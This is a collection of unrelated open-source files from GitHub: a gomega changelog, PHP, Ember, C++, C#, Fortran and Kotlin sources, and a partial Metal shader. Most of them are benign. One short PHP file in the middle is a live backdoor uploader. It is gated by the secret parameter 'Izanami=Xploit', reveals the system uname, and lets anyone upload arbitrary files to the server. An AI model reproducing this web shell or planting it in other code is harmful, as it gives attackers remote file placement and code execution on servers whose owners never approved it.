- Improve message from AssignableToTypeOf when expected value is nil (#281) [9c1fb20]
## 1.3.0
Improvements:
- The `Equal` matcher matches byte slices more performantly.
- Improved how `MatchError` matches error strings.
- `MatchXML` ignores the order of xml node attributes.
- Improve support for XUnit style golang tests. ([#254](https://github.com/onsi/gomega/issues/254))
Bug Fixes:
- Diff generation now handles multi-byte sequences correctly.
- Multiple goroutines can now call `gexec.Build` concurrently.
## 1.2.0
Improvements:
- Added `BeSent` which attempts to send a value down a channel and fails if the attempt blocks. Can be paired with `Eventually` to safely send a value down a channel with a timeout.
- `Ω`, `Expect`, `Eventually`, and `Consistently` now immediately `panic` if there is no registered fail handler. This is always a mistake that can hide failing tests.
- `Receive()` no longer errors when passed a closed channel; it's perfectly fine to attempt to read from a closed channel, so Ω(c).Should(Receive()) always fails and Ω(c).ShouldNot(Receive()) always passes with a closed channel.
- Added `HavePrefix` and `HaveSuffix` matchers.
- `ghttp` can now handle concurrent requests.
- Added `Succeed` which allows one to write `Ω(MyFunction()).Should(Succeed())`.
- Improved `ghttp`'s behavior around failing assertions and panics:
- If a registered handler makes a failing assertion `ghttp` will return `500`.
- If a registered handler panics, `ghttp` will return `500` *and* fail the test. This is new behavior that may cause existing code to break. This code is almost certainly incorrect and creating a false positive.
- `ghttp` servers can take an `io.Writer`. `ghttp` will write a line to the writer when each request arrives.
- Added `WithTransform` matcher to allow munging input data before feeding into the relevant matcher
- Added boolean `And`, `Or`, and `Not` matchers to allow creating composite matchers
- Added `gbytes.TimeoutCloser`, `gbytes.TimeoutReader`, and `gbytes.TimeoutWriter` - these are convenience wrappers that time out if the underlying Closer/Reader/Writer does not return within the allotted time.
- Added `gbytes.BufferReader` - this constructs a `gbytes.Buffer` that asynchronously reads the passed-in `io.Reader` into its buffer.
Bug Fixes:
- gexec: `session.Wait` now uses `EventuallyWithOffset` to get the right line number in the failure.
- `ContainElement` no longer bails if a passed-in matcher errors.
## 1.0 (8/2/2014)
No changes. Dropping "beta" from the version number.
## 1.0.0-beta (7/8/2014)
Breaking Changes:
- Changed OmegaMatcher interface. Instead of having `Match` return failure messages, two new methods `FailureMessage` and `NegatedFailureMessage` are called instead.
- Moved and renamed OmegaFailHandler to types.GomegaFailHandler and OmegaMatcher to types.GomegaMatcher. Any references to OmegaMatcher in any custom matchers will need to be changed to point to types.GomegaMatcher
New Test-Support Features:
- `ghttp`: supports testing http clients
- Provides a flexible fake http server
- Provides a collection of chainable http handlers that perform assertions.
- `gbytes`: supports making ordered assertions against streams of data
- Provides a `gbytes.Buffer`
- Provides a `Say` matcher to perform ordered assertions against output data
- `gexec`: supports testing external processes
- Provides support for building Go binaries
- Wraps and starts `exec.Cmd` commands
- Makes it easy to assert against stdout and stderr
- Makes it easy to send signals and wait for processes to exit
- Provides an `Exit` matcher to assert against exit code.
DSL Changes:
- `Eventually` and `Consistently` can accept `time.Duration` interval and polling inputs.
- The default timeouts for `Eventually` and `Consistently` are now configurable.
New Matchers:
- `ConsistOf`: order-independent assertion against the elements of an array/slice or keys of a map.
- `BeTemporally`: like `BeNumerically` but for `time.Time`
- `HaveKeyWithValue`: asserts a map has a given key with the given value.
Updated Matchers:
- `Receive` matcher can take a matcher as an argument and passes only if the channel under test receives an object that satisfies the passed-in matcher.
- Matchers that implement `MatchMayChangeInTheFuture(actual interface{}) bool` can inform `Eventually` and/or `Consistently` when a match has no chance of changing status in the future. For example, `Receive` returns `false` when a channel is closed.
Misc:
- Start using semantic versioning
- Start maintaining changelog
Major refactor:
- Pull out Gomega's internal to `internal`
| {
"pile_set_name": "Github"
} |
<?php
/**
* Figlet CAPTCHA.
*
* PHP version 7
*
* Copyright (C) Villanova University 2020.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2,
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
* @category VuFind
* @package CAPTCHA
* @author Mario Trojan <[email protected]>
* @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License
* @link https://vufind.org Main Page
*/
namespace VuFind\Captcha;
/**
* Figlet CAPTCHA.
*
* @category VuFind
* @package CAPTCHA
* @author Mario Trojan <[email protected]>
* @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License
* @link https://vufind.org/wiki/development Wiki
*/
class Figlet extends LaminasBase
{
    // Intentionally empty: all Figlet CAPTCHA behavior is inherited from
    // LaminasBase. The subclass presumably exists so this CAPTCHA type can be
    // selected by class name in configuration — confirm against the factory.
}
| {
"pile_set_name": "Github"
} |
import { inject as service } from '@ember/service';
import Component from '@ember/component';
import Errors from 'ui/utils/errors';
import layout from './template';
import {
get, set, observer, computed, setProperties
} from '@ember/object';
import { on } from '@ember/object/evented';
export default Component.extend({
  settings: service(),
  access: service(),
  intl: service(),
  router: service(),

  layout,
  tagName: 'section',
  classNames: ['well'],

  model: null,
  individuals: 'siteAccess.users',
  collection: 'siteAccess.groups',
  principals: null,

  saved: true,
  errors: null,

  actions: {
    // Add a principal to the allowed list, rejecting duplicates.
    addAuthorized(principal) {
      if ( !principal ) {
        return;
      }

      this.send('clearError');
      set(this, 'saved', false);

      if (this.checkDuplicate(principal)) {
        this.send('gotError', get(this, 'intl').t('siteAccess.dupe'))
      } else {
        get(this, 'model.allowedPrincipalIds').pushObject(principal.id);
      }
    },

    // Ask the API to refresh auth-provider access for all users.
    refreshAllTokens() {
      set(this, 'refreshing', true);
      this.globalStore.request({
        url: '/v3/users?action=refreshauthprovideraccess',
        method: 'POST',
        data: {}
      })
        .catch((err) => {
          set(this, 'errors', [err.message]);
        })
        .finally(() => {
          set(this, 'refreshing', false);
        });
    },

    removeAuthorized(id) {
      set(this, 'saved', false);
      get(this, 'model.allowedPrincipalIds').removeObject(id);
    },

    // Persist the access-mode settings. Restricted modes require at least
    // one allowed principal so the site cannot become unreachable.
    save(btnCb) {
      this.send('clearError');

      if ( get(this, 'model.accessMode') !== 'unrestricted' && !get(this, 'model.allowedPrincipalIds.length') ) {
        this.send('gotError', get(this, 'intl').t('siteAccess.minimum'));
        btnCb();

        return;
      }

      set(this, 'saved', false);

      const model = get(this, 'model');

      model.save().then(() => {
        set(this, 'saved', true);
      }).catch((err) => {
        this.send('gotError', err);
      }).finally(() => {
        btnCb();
      });
    },

    cancel() {
      if (this.cancel) {
        this.cancel();
      } else {
        this.router.transitionTo('global-admin.security.authentication');
      }
    },

    gotError(err) {
      set(this, 'errors', [Errors.stringify(err)]);
    },

    clearError() {
      // BUGFIX: previously cleared 'errors' twice (a set() followed by a
      // redundant setProperties() of the same value); once is sufficient.
      set(this, 'errors', null);
    },
  },

  showList: computed('model.accessMode', function() {
    return get(this, 'model.accessMode') !== 'unrestricted';
  }),

  // When the access mode becomes restricted, make sure the current user's
  // principal is present in the allowed list so they cannot lock themselves out.
  accessModeChanged: on('init', observer('model.accessMode', function() {
    set(this, 'saved', false);

    const allowedPrincipals = get(this, 'model.allowedPrincipalIds') || []; // ['princ_id1://yada']

    if ( get(this, 'model.accessMode') !== 'unrestricted' ) {
      let found = false;
      const myPIds = get(this, 'access.me.principalIds');

      myPIds.forEach( (id) => {
        if (allowedPrincipals.indexOf(id) >= 0) {
          found = true;
        }
      });

      if ( !found && !allowedPrincipals.length) {
        allowedPrincipals.pushObject(get(this, 'access.principal.id'));
      }
    }

    set(this, 'model.allowedPrincipalIds', allowedPrincipals);
  })),

  checkDuplicate(principal) {
    // includes() already yields a boolean; the old `? true : false` was redundant.
    return (get(this, 'model.allowedPrincipalIds') || []).includes(principal.id);
  },
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2017-2020 Baidu Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef _OPENRASP_UTILS_NET_H_
#define _OPENRASP_UTILS_NET_H_

#include <string>
#include <vector>
#include <map>

namespace openrasp
{
// Populate `if_addr_map` with one entry per network interface
// (presumably interface-name -> address; confirm against the implementation).
void fetch_if_addrs(std::map<std::string, std::string> &if_addr_map);

// Append the hardware (MAC) addresses of the host's interfaces to `hw_addrs`.
void fetch_hw_addrs(std::vector<std::string> &hw_addrs);

// Determine the local source IP used when sending packets toward `url`,
// writing at most `len` bytes into `local_ip`; returns true on success.
// NOTE(review): `url` is non-const — confirm whether the implementation
// mutates it; `const char *` would be friendlier to callers.  Also `size_t`
// is used without including <cstddef>; it is pulled in transitively today.
bool fetch_source_in_ip_packets(char *local_ip, size_t len, char *url);

// Resolve `host` to its list of addresses (name lookup).
std::vector<std::string> lookup_host(const std::string &host);

} // namespace openrasp
#endif
| {
"pile_set_name": "Github"
} |
//----------------------------------------------
// NGUI: Next-Gen UI kit
// Copyright © 2011-2014 Tasharen Entertainment
//----------------------------------------------
using UnityEngine;
using System.Collections.Generic;
/// <summary>
/// Glyph structure used by BMFont. For more information see http://www.angelcode.com/products/bmfont/
/// </summary>
/// <summary>
/// Glyph structure used by BMFont. See http://www.angelcode.com/products/bmfont/
/// Kerning pairs are stored flat in <c>kerning</c> as (previousChar, amount)
/// pairs at even/odd indices.
/// </summary>
[System.Serializable]
public class BMGlyph
{
	public int index;	// Glyph index used by BMFont
	public int x;		// Left edge of the glyph inside the texture
	public int y;		// Top edge of the glyph inside the texture
	public int width;	// Width of the glyph, in pixels
	public int height;	// Height of the glyph, in pixels
	public int offsetX;	// Horizontal cursor offset applied before drawing
	public int offsetY;	// Vertical cursor offset applied before drawing
	public int advance;	// Cursor advance after printing this character
	public int channel;	// Channel mask (usually 15 = RGBA, 1+2+4+8)
	public List<int> kerning;

	/// <summary>
	/// Kerning adjustment to apply given the previous character, or 0 if none.
	/// </summary>

	public int GetKerning (int previousChar)
	{
		if (previousChar != 0 && kerning != null)
		{
			int count = kerning.Count;
			int i = 0;

			// Pairs are laid out flat: [char, amount, char, amount, ...]
			while (i < count)
			{
				if (kerning[i] == previousChar) return kerning[i + 1];
				i += 2;
			}
		}
		return 0;
	}

	/// <summary>
	/// Add a kerning entry for the specified previous character, or update it.
	/// </summary>

	public void SetKerning (int previousChar, int amount)
	{
		if (kerning == null) kerning = new List<int>();

		int existing = -1;

		for (int i = 0; i < kerning.Count; i += 2)
		{
			if (kerning[i] == previousChar)
			{
				existing = i;
				break;
			}
		}

		if (existing != -1)
		{
			kerning[existing + 1] = amount;
		}
		else
		{
			kerning.Add(previousChar);
			kerning.Add(amount);
		}
	}

	/// <summary>
	/// Clamp the glyph rectangle to the given bounds, adjusting the draw
	/// offsets so the visible portion stays in place.
	/// </summary>

	public void Trim (int xMin, int yMin, int xMax, int yMax)
	{
		int right = x + width;
		int bottom = y + height;

		if (x < xMin)
		{
			int delta = xMin - x;
			x += delta;
			width -= delta;
			offsetX += delta;
		}

		if (y < yMin)
		{
			int delta = yMin - y;
			y += delta;
			height -= delta;
			offsetY += delta;
		}

		if (right > xMax) width -= right - xMax;
		if (bottom > yMax) height -= bottom - yMax;
	}
}
| {
"pile_set_name": "Github"
} |
<?php
error_reporting(0);
set_time_limit(0);
if($_GET['Izanami']=="Xploit"){
echo "<center><b>Uname:".php_uname()."<br></b>";
echo '<font color="black" size="4">';
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $qx);
@chmod ($qx, octdec($mode));
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
}
}
else{
echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo '</center></font>';
}
?> | {
"pile_set_name": "Github"
} |
*> \brief \b CHESWAPR applies an elementary permutation on the rows and columns of a Hermitian matrix.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation available at
* http://www.netlib.org/lapack/explore-html/
*
*> \htmlonly
*> Download CHESWAPR + dependencies
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/cheswapr.f">
*> [TGZ]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/cheswapr.f">
*> [ZIP]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/cheswapr.f">
*> [TXT]</a>
*> \endhtmlonly
*
* Definition:
* ===========
*
* SUBROUTINE CHESWAPR( UPLO, N, A, LDA, I1, I2)
*
* .. Scalar Arguments ..
* CHARACTER UPLO
* INTEGER I1, I2, LDA, N
* ..
* .. Array Arguments ..
* COMPLEX A( LDA, N )
*
*
*> \par Purpose:
* =============
*>
*> \verbatim
*>
*> CHESWAPR applies an elementary permutation on the rows and the columns of
*> a hermitian matrix.
*> \endverbatim
*
* Arguments:
* ==========
*
*> \param[in] UPLO
*> \verbatim
*> UPLO is CHARACTER*1
*> Specifies whether the details of the factorization are stored
*> as an upper or lower triangular matrix.
*> = 'U': Upper triangular, form is A = U*D*U**T;
*> = 'L': Lower triangular, form is A = L*D*L**T.
*> \endverbatim
*>
*> \param[in] N
*> \verbatim
*> N is INTEGER
*> The order of the matrix A. N >= 0.
*> \endverbatim
*>
*> \param[in,out] A
*> \verbatim
*>          A is COMPLEX array, dimension (LDA,N)
*>          On entry, the NB diagonal matrix D and the multipliers
*>          used to obtain the factor U or L as computed by CHETRF.
*>
*>          On exit, if INFO = 0, the (Hermitian) inverse of the original
*>          matrix. If UPLO = 'U', the upper triangular part of the
*> inverse is formed and the part of A below the diagonal is not
*> referenced; if UPLO = 'L' the lower triangular part of the
*> inverse is formed and the part of A above the diagonal is
*> not referenced.
*> \endverbatim
*>
*> \param[in] LDA
*> \verbatim
*> LDA is INTEGER
*> The leading dimension of the array A. LDA >= max(1,N).
*> \endverbatim
*>
*> \param[in] I1
*> \verbatim
*> I1 is INTEGER
*> Index of the first row to swap
*> \endverbatim
*>
*> \param[in] I2
*> \verbatim
*> I2 is INTEGER
*> Index of the second row to swap
*> \endverbatim
*
* Authors:
* ========
*
*> \author Univ. of Tennessee
*> \author Univ. of California Berkeley
*> \author Univ. of Colorado Denver
*> \author NAG Ltd.
*
*> \date December 2016
*
*> \ingroup complexHEauxiliary
*
* =====================================================================
      SUBROUTINE CHESWAPR( UPLO, N, A, LDA, I1, I2)
*
*  -- LAPACK auxiliary routine (version 3.7.0) --
*  -- LAPACK is a software package provided by Univ. of Tennessee,    --
*  -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..--
*     December 2016
*
*     .. Scalar Arguments ..
      CHARACTER        UPLO
      INTEGER          I1, I2, LDA, N
*     ..
*     .. Array Arguments ..
      COMPLEX          A( LDA, N )
*
*  =====================================================================
*
*     ..
*     .. Local Scalars ..
      LOGICAL          UPPER
      INTEGER          I
      COMPLEX          TMP
*
*     .. External Functions ..
      LOGICAL          LSAME
      EXTERNAL         LSAME
*     ..
*     .. External Subroutines ..
      EXTERNAL         CSWAP
*     ..
*     .. Executable Statements ..
*
*     Apply a symmetric row/column interchange (I1 <-> I2) to a Hermitian
*     matrix, touching only the triangle selected by UPLO.  Entries whose
*     row/column roles are exchanged across the diagonal must be conjugated
*     to keep the stored triangle consistent with a Hermitian matrix.
*
      UPPER = LSAME( UPLO, 'U' )
      IF (UPPER) THEN
*
*         UPPER
*         first swap
*          - swap column I1 and I2 from I1 to I1-1
         CALL CSWAP( I1-1, A(1,I1), 1, A(1,I2), 1 )
*
*          second swap :
*          - swap A(I1,I1) and A(I2,I2)
*          - swap row I1 from I1+1 to I2-1 with col I2 from I1+1 to I2-1
*            (conjugating, since rows become columns across the diagonal)
*          - swap A(I2,I1) and A(I1,I2)
         TMP=A(I1,I1)
         A(I1,I1)=A(I2,I2)
         A(I2,I2)=TMP
*
         DO I=1,I2-I1-1
            TMP=A(I1,I1+I)
            A(I1,I1+I)=CONJG(A(I1+I,I2))
            A(I1+I,I2)=CONJG(TMP)
         END DO
*
         A(I1,I2)=CONJG(A(I1,I2))
*
*          third swap
*          - swap row I1 and I2 from I2+1 to N
         DO I=I2+1,N
            TMP=A(I1,I)
            A(I1,I)=A(I2,I)
            A(I2,I)=TMP
         END DO
*
      ELSE
*
*         LOWER
*         first swap
*          - swap row I1 and I2 from 1 to I1-1
         CALL CSWAP ( I1-1, A(I1,1), LDA, A(I2,1), LDA )
*
*         second swap :
*          - swap A(I1,I1) and A(I2,I2)
*          - swap col I1 from I1+1 to I2-1 with row I2 from I1+1 to I2-1
*            (conjugating, mirror image of the upper-triangular case)
*          - swap A(I2,I1) and A(I1,I2)
          TMP=A(I1,I1)
          A(I1,I1)=A(I2,I2)
          A(I2,I2)=TMP
*
          DO I=1,I2-I1-1
             TMP=A(I1+I,I1)
             A(I1+I,I1)=CONJG(A(I2,I1+I))
             A(I2,I1+I)=CONJG(TMP)
          END DO
*
          A(I2,I1)=CONJG(A(I2,I1))
*
*         third swap
*          - swap col I1 and I2 from I2+1 to N
          DO I=I2+1,N
             TMP=A(I,I1)
             A(I,I1)=A(I,I2)
             A(I,I2)=TMP
          END DO
*
      ENDIF
      END SUBROUTINE CHESWAPR
| {
"pile_set_name": "Github"
} |
package org.elixir_lang.beam.chunk.debug_info.v1.erl_abstract_code.abstract_code_compiler_options.abstract_code
import com.ericsson.otp.erlang.OtpErlangObject
import com.ericsson.otp.erlang.OtpErlangTuple
import org.elixir_lang.beam.chunk.debug_info.v1.erl_abstract_code.abstract_code_compiler_options.AbstractCode.ifTag
object Tuple {
    /**
     * If [term] carries the `tuple` tag, render it as a macro string;
     * otherwise return `null`.
     */
    fun ifToMacroStringDeclaredScope(term: OtpErlangObject, scope: Scope): MacroStringDeclaredScope? =
            ifTag(term, TAG) { toMacroStringDeclaredScope(it, scope) }

    /**
     * Render an abstract-code tuple node as an Elixir tuple literal
     * (`{elem1, elem2, ...}`), propagating the declared scope collected
     * from the elements.
     */
    fun toMacroStringDeclaredScope(term: OtpErlangTuple, scope: Scope): MacroStringDeclaredScope =
            elementsMacroStringDeclaredScope(term, scope).let { (elementsMacroString, elementsDeclaredScope) ->
                MacroStringDeclaredScope("{$elementsMacroString}", elementsDeclaredScope)
            }

    // Erlang abstract-code tag identifying tuple nodes.
    private const val TAG = "tuple"

    // Falls back to a "missing_elements" placeholder when the node has no
    // element list at the expected position.
    private fun elementsMacroStringDeclaredScope(term: OtpErlangTuple, scope: Scope) =
            toElements(term)
                    ?.let { Elements.toMacroStringDeclaredScope(it, scope) }
                    ?: MacroStringDeclaredScope("missing_elements", Scope.EMPTY)

    // The element list is the third slot (index 2) of the tuple node.
    private fun toElements(term: OtpErlangTuple): OtpErlangObject? = term.elementAt(2)
}
| {
"pile_set_name": "Github"
} |
#pragma clang diagnostic ignored "-Wmissing-prototypes"
#pragma clang diagnostic ignored "-Wmissing-braces"
#include <metal_stdlib>
#include <simd/simd.h>
using namespace metal;
// Fixed-size array wrapper (appears to be SPIRV-Cross generated support code):
// provides operator[] overloads for every Metal address space so that the
// generated shader can index arrays regardless of where they are stored
// (thread, device, constant, threadgroup).
template<typename T, size_t Num>
struct spvUnsafeArray
{
    // "Num ? Num : 1" keeps a zero-length instantiation legal in MSL.
    T elements[Num ? Num : 1];

    thread T& operator [] (size_t pos) thread
    {
        return elements[pos];
    }
    constexpr const thread T& operator [] (size_t pos) const thread
    {
        return elements[pos];
    }

    device T& operator [] (size_t pos) device
    {
        return elements[pos];
    }
    constexpr const device T& operator [] (size_t pos) const device
    {
        return elements[pos];
    }

    constexpr const constant T& operator [] (size_t pos) const constant
    {
        return elements[pos];
    }

    threadgroup T& operator [] (size_t pos) threadgroup
    {
        return elements[pos];
    }
    constexpr const threadgroup T& operator [] (size_t pos) const threadgroup
    {
        return elements[pos];
    }
};
struct type_View
{
float4x4 View_TranslatedWorldToClip;
float4x4 View_WorldToClip;
float4x4 View_ClipToWorld;
float4x4 View_TranslatedWorldToView;
float4x4 View_ViewToTranslatedWorld;
float4x4 View_TranslatedWorldToCameraView;
float4x4 View_CameraViewToTranslatedWorld;
float4x4 View_ViewToClip;
float4x4 View_ViewToClipNoAA;
float4x4 View_ClipToView;
float4x4 View_ClipToTranslatedWorld;
float4x4 View_SVPositionToTranslatedWorld;
float4x4 View_ScreenToWorld;
float4x4 View_ScreenToTranslatedWorld;
packed_float3 View_ViewForward;
float PrePadding_View_908;
packed_float3 View_ViewUp;
float PrePadding_View_924;
packed_float3 View_ViewRight;
float PrePadding_View_940;
packed_float3 View_HMDViewNoRollUp;
float PrePadding_View_956;
packed_float3 View_HMDViewNoRollRight;
float PrePadding_View_972;
float4 View_InvDeviceZToWorldZTransform;
float4 View_ScreenPositionScaleBias;
packed_float3 View_WorldCameraOrigin;
float PrePadding_View_1020;
packed_float3 View_TranslatedWorldCameraOrigin;
float PrePadding_View_1036;
packed_float3 View_WorldViewOrigin;
float PrePadding_View_1052;
packed_float3 View_PreViewTranslation;
float PrePadding_View_1068;
float4x4 View_PrevProjection;
float4x4 View_PrevViewProj;
float4x4 View_PrevViewRotationProj;
float4x4 View_PrevViewToClip;
float4x4 View_PrevClipToView;
float4x4 View_PrevTranslatedWorldToClip;
float4x4 View_PrevTranslatedWorldToView;
float4x4 View_PrevViewToTranslatedWorld;
float4x4 View_PrevTranslatedWorldToCameraView;
float4x4 View_PrevCameraViewToTranslatedWorld;
packed_float3 View_PrevWorldCameraOrigin;
float PrePadding_View_1724;
packed_float3 View_PrevWorldViewOrigin;
float PrePadding_View_1740;
packed_float3 View_PrevPreViewTranslation;
float PrePadding_View_1756;
float4x4 View_PrevInvViewProj;
float4x4 View_PrevScreenToTranslatedWorld;
float4x4 View_ClipToPrevClip;
float4 View_TemporalAAJitter;
float4 View_GlobalClippingPlane;
float2 View_FieldOfViewWideAngles;
float2 View_PrevFieldOfViewWideAngles;
float4 View_ViewRectMin;
float4 View_ViewSizeAndInvSize;
float4 View_BufferSizeAndInvSize;
float4 View_BufferBilinearUVMinMax;
int View_NumSceneColorMSAASamples;
float View_PreExposure;
float View_OneOverPreExposure;
float PrePadding_View_2076;
float4 View_DiffuseOverrideParameter;
float4 View_SpecularOverrideParameter;
float4 View_NormalOverrideParameter;
float2 View_RoughnessOverrideParameter;
float View_PrevFrameGameTime;
float View_PrevFrameRealTime;
float View_OutOfBoundsMask;
float PrePadding_View_2148;
float PrePadding_View_2152;
float PrePadding_View_2156;
packed_float3 View_WorldCameraMovementSinceLastFrame;
float View_CullingSign;
float View_NearPlane;
float View_AdaptiveTessellationFactor;
float View_GameTime;
float View_RealTime;
float View_DeltaTime;
float View_MaterialTextureMipBias;
float View_MaterialTextureDerivativeMultiply;
uint View_Random;
uint View_FrameNumber;
uint View_StateFrameIndexMod8;
uint View_StateFrameIndex;
float View_CameraCut;
float View_UnlitViewmodeMask;
float PrePadding_View_2228;
float PrePadding_View_2232;
float PrePadding_View_2236;
float4 View_DirectionalLightColor;
packed_float3 View_DirectionalLightDirection;
float PrePadding_View_2268;
float4 View_TranslucencyLightingVolumeMin[2];
float4 View_TranslucencyLightingVolumeInvSize[2];
float4 View_TemporalAAParams;
float4 View_CircleDOFParams;
float View_DepthOfFieldSensorWidth;
float View_DepthOfFieldFocalDistance;
float View_DepthOfFieldScale;
float View_DepthOfFieldFocalLength;
float View_DepthOfFieldFocalRegion;
float View_DepthOfFieldNearTransitionRegion;
float View_DepthOfFieldFarTransitionRegion;
float View_MotionBlurNormalizedToPixel;
float View_bSubsurfacePostprocessEnabled;
float View_GeneralPurposeTweak;
float View_DemosaicVposOffset;
float PrePadding_View_2412;
packed_float3 View_IndirectLightingColorScale;
float View_HDR32bppEncodingMode;
packed_float3 View_AtmosphericFogSunDirection;
float View_AtmosphericFogSunPower;
float View_AtmosphericFogPower;
float View_AtmosphericFogDensityScale;
float View_AtmosphericFogDensityOffset;
float View_AtmosphericFogGroundOffset;
float View_AtmosphericFogDistanceScale;
float View_AtmosphericFogAltitudeScale;
float View_AtmosphericFogHeightScaleRayleigh;
float View_AtmosphericFogStartDistance;
float View_AtmosphericFogDistanceOffset;
float View_AtmosphericFogSunDiscScale;
float View_AtmosphericFogSunDiscHalfApexAngleRadian;
float PrePadding_View_2492;
float4 View_AtmosphericFogSunDiscLuminance;
uint View_AtmosphericFogRenderMask;
uint View_AtmosphericFogInscatterAltitudeSampleNum;
uint PrePadding_View_2520;
uint PrePadding_View_2524;
float4 View_AtmosphericFogSunColor;
packed_float3 View_NormalCurvatureToRoughnessScaleBias;
float View_RenderingReflectionCaptureMask;
float4 View_AmbientCubemapTint;
float View_AmbientCubemapIntensity;
float View_SkyLightParameters;
float PrePadding_View_2584;
float PrePadding_View_2588;
float4 View_SkyLightColor;
float4 View_SkyIrradianceEnvironmentMap[7];
float View_MobilePreviewMode;
float View_HMDEyePaddingOffset;
float View_ReflectionCubemapMaxMip;
float View_ShowDecalsMask;
uint View_DistanceFieldAOSpecularOcclusionMode;
float View_IndirectCapsuleSelfShadowingIntensity;
float PrePadding_View_2744;
float PrePadding_View_2748;
packed_float3 View_ReflectionEnvironmentRoughnessMixingScaleBiasAndLargestWeight;
int View_StereoPassIndex;
float4 View_GlobalVolumeCenterAndExtent[4];
float4 View_GlobalVolumeWorldToUVAddAndMul[4];
float View_GlobalVolumeDimension;
float View_GlobalVolumeTexelSize;
float View_MaxGlobalDistance;
float PrePadding_View_2908;
int2 View_CursorPosition;
float View_bCheckerboardSubsurfaceProfileRendering;
float PrePadding_View_2924;
packed_float3 View_VolumetricFogInvGridSize;
float PrePadding_View_2940;
packed_float3 View_VolumetricFogGridZParams;
float PrePadding_View_2956;
float2 View_VolumetricFogSVPosToVolumeUV;
float View_VolumetricFogMaxDistance;
float PrePadding_View_2972;
packed_float3 View_VolumetricLightmapWorldToUVScale;
float PrePadding_View_2988;
packed_float3 View_VolumetricLightmapWorldToUVAdd;
float PrePadding_View_3004;
packed_float3 View_VolumetricLightmapIndirectionTextureSize;
float View_VolumetricLightmapBrickSize;
packed_float3 View_VolumetricLightmapBrickTexelSize;
float View_StereoIPD;
float View_IndirectLightingCacheShowFlag;
float View_EyeToPixelSpreadAngle;
float PrePadding_View_3048;
float PrePadding_View_3052;
float4x4 View_WorldToVirtualTexture;
float4 View_VirtualTextureParams;
float4 View_XRPassthroughCameraUVs[2];
};
// Material uniform block (generated): tables of packed vector/scalar
// expression values indexed by the compiled material.  Layout must match the
// host-side buffer exactly — do not reorder or resize these arrays.
struct type_Material
{
    float4 Material_VectorExpressions[5];
    float4 Material_ScalarExpressions[2];
};
constant float4 _118 = {};
struct main0_out
{
float4 out_var_TEXCOORD6 [[user(locn0)]];
float4 out_var_TEXCOORD7 [[user(locn1)]];
float4 out_var_TEXCOORD10_centroid [[user(locn2)]];
float4 out_var_TEXCOORD11_centroid [[user(locn3)]];
float gl_ClipDistance [[clip_distance]] [1];
float4 gl_Position [[position]];
};
struct main0_in
{
float4 in_var_PN_DominantEdge2 [[attribute(3)]];
float4 in_var_PN_DominantEdge3 [[attribute(4)]];
float3 in_var_PN_DominantEdge4 [[attribute(5)]];
float3 in_var_PN_DominantEdge5 [[attribute(6)]];
float4 in_var_PN_DominantVertex1 [[attribute(8)]];
float3 in_var_PN_DominantVertex2 [[attribute(9)]];
float4 in_var_PN_POSITION_0 [[attribute(10)]];
float4 in_var_PN_POSITION_1 [[attribute(11)]];
float4 in_var_PN_POSITION_2 [[attribute(12)]];
float in_var_PN_WorldDisplacementMultiplier [[attribute(15)]];
float4 in_var_TEXCOORD10_centroid [[attribute(16)]];
float4 in_var_TEXCOORD11_centroid [[attribute(17)]];
float4 in_var_TEXCOORD6 [[attribute(18)]];
float4 in_var_TEXCOORD8 [[attribute(19)]];
};
struct main0_patchIn
{
float4 in_var_PN_POSITION9 [[attribute(13)]];
patch_control_point<main0_in> gl_in;
};
[[ patch(triangle, 0) ]] vertex main0_out main0(main0_patchIn patchIn [[stage_in]], constant type_View& View [[buffer(0)]], constant type_Material& Material [[buffer(1)]], texture3d<float> View_GlobalDistanceFieldTexture0 [[texture(0)]], texture3d<float> View_GlobalDistanceFieldTexture1 [[texture(1)]], texture3d<float> View_GlobalDistanceFieldTexture2 [[texture(2)]], texture3d<float> View_GlobalDistanceFieldTexture3 [[texture(3)]], sampler View_GlobalDistanceFieldSampler0 [[sampler(0)]], float3 gl_TessCoord [[position_in_patch]])
{
main0_out out = {};
spvUnsafeArray<float4, 3> _120 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD6, patchIn.gl_in[1].in_var_TEXCOORD6, patchIn.gl_in[2].in_var_TEXCOORD6 });
spvUnsafeArray<float4, 3> _121 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD8, patchIn.gl_in[1].in_var_TEXCOORD8, patchIn.gl_in[2].in_var_TEXCOORD8 });
